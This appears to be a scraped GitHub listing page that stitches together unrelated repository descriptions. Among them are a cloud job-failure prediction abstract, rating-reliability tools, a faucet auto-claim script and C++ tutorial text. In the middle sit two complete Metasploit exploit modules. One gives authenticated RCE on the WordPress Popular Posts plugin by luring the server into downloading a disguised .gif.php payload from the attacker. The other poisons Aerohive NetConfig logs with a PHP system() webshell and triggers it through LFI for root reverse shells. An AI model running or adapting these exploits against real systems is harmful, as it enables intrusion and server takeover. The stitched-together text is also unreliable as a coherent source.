Learning and using prediction of failures is one of the important steps to improve the reliability of a cloud computing system. Furthermore, it gives the ability to avoid incidents of failure and cost overhead for the system. The breakthroughs of machine learning and cloud storage have created a wonderful opportunity to utilize the huge amount of generated data, providing pathways to predict when the system or hardware malfunctions or fails. It can be used to improve the reliability of the system with the help of insights from statistical analysis of the workload data from cloud providers. This research discusses job usage data of tasks in the large “Google Cluster Workload Traces 2019” dataset, using multiple resampling techniques such as “Random Under Sampling, Random Oversampling and Synthetic Minority Oversampling Technique” to handle the imbalanced dataset. Furthermore, it uses multiple machine learning algorithms: the traditional machine learning algorithms are “Logistic Regression, Decision Tree Classifier, Random Forest Classifier, Gradient Boosting Classifier and Extreme Gradient Boosting Classifier”, while the deep learning algorithms are “Long Short-Term Memory (LSTM) and Gated Recurrent Unit (GRU)”, for job failure prediction on imbalanced and balanced datasets. The imbalanced and balanced cases are then compared in terms of model accuracy, error rate, sensitivity, F-measure, and precision. The results are that the Extreme Gradient Boosting Classifier and Gradient Boosting Classifier are the best-performing algorithms with and without imbalance handling techniques. It showcases that SMOTE is the best method to choose for handling imbalanced data. The deep learning models of LSTM and Gated Recurrent Unit may not be the best in terms of accuracy, but based on the ROC curve they are better than the XGBoost Classifier and Gradient Boosting Classifier.
Nate0634034090 / Nate158g M W N L P D A O E

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Popular Posts Authenticated RCE',
        'Description' => %q{
          This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080.
          The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request
          for the payload, prior to getting a GET request.
          This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2.
          The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server.
          Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget.
          A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once
          the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded
          which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a
          double extension ('.gif.php') allowing for arbitrary PHP code to be executed.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Simone Cristofaro', # edb
          'Jerome Bruandet' # original analysis
        ],
        'References' => [
          [ 'EDB', '50129' ],
          [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ],
          [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ],
          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ],
          [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ],
          [ 'CVE', '2021-42362' ]
        ],
        'Platform' => ['php'],
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DisclosureDate' => '2021-06-11',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
      OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
      # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560
      OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']),
      # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584
      OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]),
    ]
  end

  def check
    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?

    checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3')
    if checkcode == CheckCode::Safe
      print_error('Popular Posts not a vulnerable version')
    end
    return checkcode
  end

  def trigger_payload(on_disk_payload_name)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'keep_cookies' => 'true'
    )
    # loop this 5 times just incase there is a time delay in writing the file by the server
    (1..5).each do |i|
      print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5")
      Rex.sleep(10)
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name),
        'keep_cookies' => 'true'
      )
    end
    if res && res.code == 404
      print_error('Failed to find payload, may not have uploaded correctly.')
    end
  end

  def on_request_uri(cli, request, payload_name, post_id)
    if request.method == 'HEAD'
      print_good('Responding to initial HEAD request (passed check 1)')
      # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length
      # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes.
      # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught
      return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s })
    end
    if request.method == 'GET'
      on_disk_payload_name = "#{post_id}_#{payload_name}"
      register_file_for_cleanup(on_disk_payload_name)
      print_good('Responding to GET request (passed check 2)')
      send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif')
      close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions
      Rex.sleep(2) # wait for WP to finish all the checks it needs
      trigger_payload(on_disk_payload_name)
    end
    print_status("Received unexpected #{request.method} request")
  end

  def check_gd_installed(cookie)
    vprint_status('Checking if gd is installed')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),
      'method' => 'GET',
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'vars_get' => {
        'page' => 'wordpress-popular-posts',
        'tab' => 'debug'
      }
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    res.body.include? ' gd'
  end

  def get_wpp_admin_token(cookie)
    vprint_status('Retrieving wpp_admin token')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),
      'method' => 'GET',
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'vars_get' => {
        'page' => 'wordpress-popular-posts',
        'tab' => 'tools'
      }
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body
    Regexp.last_match(1)
  end

  def change_settings(cookie, token)
    vprint_status('Updating popular posts settings for images')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'vars_get' => {
        'page' => 'wordpress-popular-posts',
        'tab' => 'debug'
      },
      'vars_post' => {
        'upload_thumb_src' => '',
        'thumb_source' => 'custom_field',
        'thumb_lazy_load' => 0,
        'thumb_field' => 'wpp_thumbnail',
        'thumb_field_resize' => 1,
        'section' => 'thumb',
        'wpp-admin-token' => token
      }
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body
  end

  def clear_cache(cookie, token)
    vprint_status('Clearing image cache')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'vars_get' => {
        'page' => 'wordpress-popular-posts',
        'tab' => 'debug'
      },
      'vars_post' => {
        'action' => 'wpp_clear_thumbnail',
        'wpp-admin-token' => token
      }
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
  end

  def enable_custom_fields(cookie, custom_nonce, post)
    # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it.
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'),
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'method' => 'POST',
      'vars_post' => {
        'toggle-custom-fields-nonce' => custom_nonce,
        '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit",
        'action' => 'toggle-custom-fields'
      }
    )
    /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body
    Regexp.last_match(1)
  end

  def create_post(cookie)
    vprint_status('Creating new post')
    # get post ID and nonces
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'),
      'cookie' => cookie,
      'keep_cookies' => 'true'
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body
    /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body
    /},"post":{"id":(?<post_id>\d*)/ =~ res.body
    if ajax_nonce.nil?
      print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.')
      /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body
      ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id)
    end
    unless ajax_nonce.nil?
      vprint_status("ajax nonce: #{ajax_nonce}")
    end
    unless wp_nonce.nil?
      vprint_status("wp nonce: #{wp_nonce}")
    end
    unless post_id.nil?
      vprint_status("Created Post: #{post_id}")
    end
    fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id

    # publish new post
    vprint_status("Writing content to Post: #{post_id}")
    # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'ctype' => 'application/json',
      'accept' => 'application/json',
      'vars_get' => {
        '_locale' => 'user',
        'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id)
      },
      'data' => {
        'id' => post_id,
        'title' => Rex::Text.rand_text_alphanumeric(20..30),
        'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->",
        'status' => 'publish'
      }.to_json,
      'headers' => {
        'X-WP-Nonce' => wp_nonce,
        'X-HTTP-Method-Override' => 'PUT'
      }
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"'
    return post_id, ajax_nonce, wp_nonce
  end

  def add_meta(cookie, post_id, ajax_nonce, payload_name)
    payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}"
    vprint_status("Adding malicious metadata for redirect to #{payload_url}")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'vars_post' => {
        '_ajax_nonce' => 0,
        'action' => 'add-meta',
        'metakeyselect' => 'wpp_thumbnail',
        'metakeyinput' => '',
        'metavalue' => payload_url,
        '_ajax_nonce-add-meta' => ajax_nonce,
        'post_id' => post_id
      }
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-"
  end

  def boost_post(cookie, post_id, wp_nonce, post_count)
    # redirect as needed
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'keep_cookies' => 'true',
      'cookie' => cookie,
      'vars_get' => { 'page_id' => post_id }
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301
    print_status("Sending #{post_count} views to #{res.headers['Location']}")
    location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after>
    (1..post_count).each do |_c|
      res = send_request_cgi!(
        'uri' => "/#{location}",
        'cookie' => cookie,
        'keep_cookies' => 'true'
      )
      # just send away, who cares about the response
      fail_with(Failure::Unreachable, 'Site not responding') unless res
      fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
      res = send_request_cgi(
        # this URL varies from the POC on EDB, and is modeled after what the browser does
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'vars_get' => {
          'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts')
        },
        'keep_cookies' => 'true',
        'method' => 'POST',
        'cookie' => cookie,
        'vars_post' => {
          '_wpnonce' => wp_nonce,
          'wpp_id' => post_id,
          'sampling' => 0,
          'sampling_rate' => 100
        }
      )
      fail_with(Failure::Unreachable, 'Site not responding') unless res
      fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201
    end
    fail_with(Failure::Unreachable, 'Site not responding') unless res
  end

  def get_top_posts
    print_status('Determining post with most views')
    res = get_widget
    />(?<views>\d+) views</ =~ res.body
    views = views.to_i
    print_status("Top Views: #{views}")
    views += 5 # make us the top post
    unless datastore['VISTS'].nil?
      print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}")
      views = datastore['VISITS']
    end
    views
  end

  def get_widget
    # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond
    # which then would kill the exploit, so in this case we just keep trying.
    (1..10).each do |_|
      @res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path),
        'keep_cookies' => 'true'
      )
      break unless @res.nil?
    end
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200
    /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body
    # load the widget directly
    (1..10).each do |_|
      @res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id),
        'keep_cookies' => 'true',
        'vars_get' => {
          'is_single' => 0
        }
      )
      break unless @res.nil?
    end
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200
    @res
  end

  def exploit
    fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0'
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])

    if cookie.nil?
      vprint_error('Invalid login, check credentials')
      return
    end

    payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php"
    vprint_status("Payload file name: #{payload_name}")

    fail_with(Failure::NotVulnerable, 'gd is not installed on server, unexploitable') unless check_gd_installed(cookie)
    post_count = get_top_posts

    # we dont need to pass the cookie anymore since its now saved into http client
    token = get_wpp_admin_token(cookie)
    vprint_status("wpp_admin_token: #{token}")
    change_settings(cookie, token)
    clear_cache(cookie, token)
    post_id, ajax_nonce, wp_nonce = create_post(cookie)
    print_status('Starting web server to handle request for image payload')
    start_service({
      'Uri' => {
        'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) },
        'Path' => "/#{payload_name}"
      }
    })

    add_meta(cookie, post_id, ajax_nonce, payload_name)
    boost_post(cookie, post_id, wp_nonce, post_count)
    print_status('Waiting 90sec for cache refresh by server')
    Rex.sleep(90)
    print_status('Attempting to force loading of shell by visiting to homepage and loading the widget')
    res = get_widget
    print_good('We made it to the top!') if res.body.include? payload_name
    # if res.body.include? datastore['SRVHOSTNAME']
    #   fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.")
    # end
    # at this point, we rely on our web server getting requests to make the rest happen
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE',
        'Description' => %q{
          This module exploits LFI and log poisoning vulnerabilities
          (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a
          build-242466 and older in order to achieve unauthenticated remote
          code execution as the root user. NetConfig is the Aerohive/Extreme
          Networks HiveOS administrative webinterface. Vulnerable versions
          allow for LFI because they rely on a version of PHP 5 that is
          vulnerable to string truncation attacks. This module leverages this
          issue in conjunction with log poisoning to gain RCE as root.
          Upon successful exploitation, the Aerohive NetConfig application
          will hang for as long as the spawned shell remains open. Closing
          the session should render the app responsive again.
          The module provides an automatic cleanup option to clean the log.
          However, this option is disabled by default because any modifications
          to the /tmp/messages log, even via sed, may render the target
          (temporarily) unexploitable. This state can last over an hour.
          This module has been successfully tested against Aerohive NetConfig
          versions 8.2r4 and 10.0r7a.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Erik de Jong', # github.com/eriknl - discovery and PoC
          'Erik Wynter' # @wyntererik - Metasploit
        ],
        'References' => [
          ['CVE', '2020-16152'], # still categorized as RESERVED
          ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code
        ],
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443
        },
        'Platform' => %w[linux unix],
        'Arch' => [ ARCH_ARMLE, ARCH_CMD ],
        'Targets' => [
          [
            'Linux', {
              'Arch' => [ARCH_ARMLE],
              'Platform' => 'linux',
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
                'CMDSTAGER::FLAVOR' => 'curl'
              }
            }
          ],
          [
            'CMD', {
              'Arch' => [ARCH_CMD],
              'Platform' => 'unix',
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target'
              }
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2020-02-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options [
      OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']),
      OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]),
    ]
  end

  def auto_clean_log
    datastore['AUTO_CLEAN_LOG']
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php5')
    })

    unless res
      return CheckCode::Unknown('Connection failed.')
    end

    unless res.code == 200 && res.body.include?('Aerohive NetConfig UI')
      return CheckCode::Safe('Target is not an Aerohive NetConfig application.')
    end

    version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first
    unless version
      return CheckCode::Detected('Could not determine Aerohive NetConfig version.')
    end

    begin
      if Rex::Version.new(version) <= Rex::Version.new('10.0r8a')
        return CheckCode::Appears("The target is Aerohive NetConfig version #{version}")
      else
        print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.')
        return CheckCode::Safe("The target is Aerohive NetConfig version #{version}")
      end
    rescue StandardError => e
      return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}")
    end
  end

  def poison_log
    password = rand_text_alphanumeric(8..12)
    @shell_cmd_name = rand_text_alphanumeric(3..6)
    @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>"

    # Poison /tmp/messages
    print_status('Attempting to poison the log at /tmp/messages...')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'login.php5'),
      'vars_post' => {
        'login_auth' => 0,
        'miniHiveUI' => 1,
        'authselect' => 'Name/Password',
        'userName' => @poison_cmd,
        'password' => password
      }
    })

    unless res
      fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages')
    end

    unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==')
      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages')
    end

    print_status('Server responded as expected. Continuing...')
  end

  def on_new_session(session)
    log_cleaned = false
    if auto_clean_log
      print_status('Attempting to clean the log file at /tmp/messages...')
      print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.')
      begin
        # We need to remove the line containing the PHP system call from /tmp/messages
        # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username.
        # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line
        # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same:
        # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period.
        line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}"
        clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}"
        cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\
        "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}"
        if session.type.to_s.eql? 'meterpreter'
          session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
          session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"")

          # Wait for cleanup
          Rex.sleep 5

          # Check for the PHP system call in /tmp/messages
          messages_contents = session.fs.file.open('/tmp/messages').read.to_s
          # using =~ here produced unexpected results, so include? is used instead
          unless messages_contents.include?(@poison_cmd)
            log_cleaned = true
          end
        elsif session.type.to_s.eql?('shell')
          session.shell_command_token(cmds_to_clean_log.to_s)

          # Check for the PHP system call in /tmp/messages
          poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'")
          # using =~ here produced unexpected results, so include? is used instead
          unless poison_evidence.include?(@poison_cmd)
            log_cleaned = true
          end
        end
      rescue StandardError => e
        print_error("Error during cleanup: #{e.message}")
      ensure
        super
      end

      unless log_cleaned
        print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages")
      end
    end

    if log_cleaned
      print_good('Successfully cleaned up the log by deleting the line with the PHP syscall from /tmp/messages.')
    else
      print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}")
      print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.')
      print_warning('Deleting /tmp/messages or clearing out the file may break the application.')
    end
  end

  def execute_command(cmd, _opts = {})
    print_status('Attempting to execute the payload')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'action.php5'),
      'vars_get' => {
        '_action' => 'list',
        'debug' => 'true'
      },
      'vars_post' => {
        '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation
        @shell_cmd_name => cmd
      }
    }, 0)

    print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.')
  end

  def exploit
    poison_log
    if target.arch.first == ARCH_CMD
      print_status('Executing the payload')
      execute_command(payload.encoded)
    else
      execute_cmdstager(background: true)
    end
  end
end
hyunsooseol / Seolmatrix This module is a tool for calculating correlations such as Partial, Tetrachoric, Intraclass correlation coefficients, Bootstrap agreement, Rater reliability, Generalizability Theory, Analytic Hierarchy Process, and allows users to produce Gaussian Graphical Model and Partial plot.
abyansetya / IRYS AutoClaim Faucet This repository provides a script to automate claiming tokens from the IRYS faucet. It helps users efficiently perform repeated claims without manual work. Features include automatic wallet rotation and optional proxy support to minimize rate limits and enhance reliability.
langtonhugh / Asreview Irr Code to automatically produce a report from ASReview on inter-rater reliability during literature screening.
djarenas / Inter Rater Inter-rater quantifies the reliability between multiple raters who evaluate a group of subjects. It calculates the group quantity, Fleiss kappa, and it improves on existing software by keeping information about each user and quantifying how each user agreed with the rest of the group. This is accomplished through permutations of user pairs. The software was written in Python, can be run in Linux, and the code is deposited in Zenodo and GitHub. This software can be used for evaluation of inter-rater reliability in systematic reviews, medical diagnosis algorithms, education applications, and others.
ArthurChenCoding / State Estimation And Localization For Self Driving Cars State estimation is a vital part of any self-driving car software stack, which relies on the sensor measurements consisting of an IMU, a GNSS receiver, and a LiDAR to provide an accurate state estimation. However, since all of the sensors provide measurements of varying reliability and at different rates and reference frames, spatial and temporal multisensor calibration is required.
robertpetermatthew / F ICC Computes the Intra Class Correlation Coefficients ICC1, ICC2, ICC3, ICC1k, ICC2k, and ICC3k. Based on the development by Shrout1979, presentation by McGraw including errata corrections. Data is returned as presented in the form returned by the ICC function in the R package 'DescTools'. Shrout, Patrick E. and Fleiss, Joseph L. Intraclass correlations: uses in assessing rater reliability. Psychological Bulletin, 1979, 86, 420-3428. McGraw, Kenneth O. and Wong, S. P. (1996), Forming inferences about some intraclass correlation coefficients. Psychological Methods, 1, 30-46. and errata in Psychological Methods, 4, page 390.
sanusanth / C English Letters Disign Pattan A To Z Part 2 What is C++? C++ is a general-purpose, object-oriented programming language. It was created by Bjarne Stroustrup at Bell Labs circa 1980. C++ is very similar to C (invented by Dennis Ritchie in the early 1970s). C++ is so compatible with C that it will probably compile over 99% of C programs without changing a line of source code. However, C++ is a much better-structured and safer language than C, as it is OOP-based. Some computer languages are written for a specific purpose. For example, Java was initially devised to control toasters and some other electronics. C was developed for programming OS. Pascal was conceptualized to teach proper programming techniques. But C++ is a general-purpose language. It well deserves the widely acknowledged nickname "Swiss Pocket Knife of Languages." C++ is a cross-platform language that can be used to create high-performance applications. C++ was developed by Bjarne Stroustrup, as an extension to the C language. C++ gives programmers a high level of control over system resources and memory. The language was updated 3 major times in 2011, 2014, and 2017 to C++11, C++14, and C++17. About C++ Programming Multi-paradigm Language - C++ supports at least seven different styles of programming. Developers can choose any of the styles. General Purpose Language - You can use C++ to develop games, desktop apps, operating systems, and so on. Speed - Like C programming, the performance of optimized C++ code is exceptional. Object-oriented - C++ allows you to divide complex problems into smaller sets by using objects. Why Learn C++? C++ is used to develop games, desktop apps, operating systems, browsers, and so on because of its performance. After learning C++, it will be much easier to learn other programming languages like Java, Python, etc. C++ helps you to understand the internal architecture of a computer and how a computer stores and retrieves information. How to learn C++?
C++ tutorial from Programiz - We provide step by step C++ tutorials, examples, and references. Get started with C++. Official C++ documentation - Might be hard to follow and understand for beginners. Visit official C++ documentation. Write a lot of C++ programming code - The only way you can learn programming is by writing a lot of code. Read C++ code - Join GitHub's open-source projects and read other people's code. C++ best programming language? The answer depends on perspective and requirements. Some tasks can be done in C++, though not very quickly. For example, designing GUI screens for applications. Other languages like Visual Basic and Python have GUI design elements built into them. Therefore, they are better suited for GUI-type tasks. Some of the scripting languages that provide extra programmability to applications such as MS Word and even Photoshop tend to be variants of Basic, not C++. C++ is still used widely, and the most famous software has its backbone in C++. This tutorial will help you learn C++ basics and advanced concepts. Who uses C++? Some of today's most visible systems have their critical parts written in C++. Examples are Amadeus (airline ticketing), Bloomberg (financial information), Amazon (Web commerce), Google (Web search), and Facebook (social media). Many programming languages depend on C++'s performance and reliability in their implementation. Examples include: Java Virtual Machines, JavaScript interpreters (e.g., Google's V8), Browsers (e.g., Internet Explorer, Mozilla's Firefox, Apple's Safari, and Google's Chrome), Application and Web frameworks (e.g., Microsoft's .NET Web services framework). Applications that involve local and wide area networks, user interaction, numeric, graphics, and database access highly depend on C++ language. Why Use C++ C++ is one of the world's most popular programming languages. C++ can be found in today's operating systems, Graphical User Interfaces, and embedded systems.
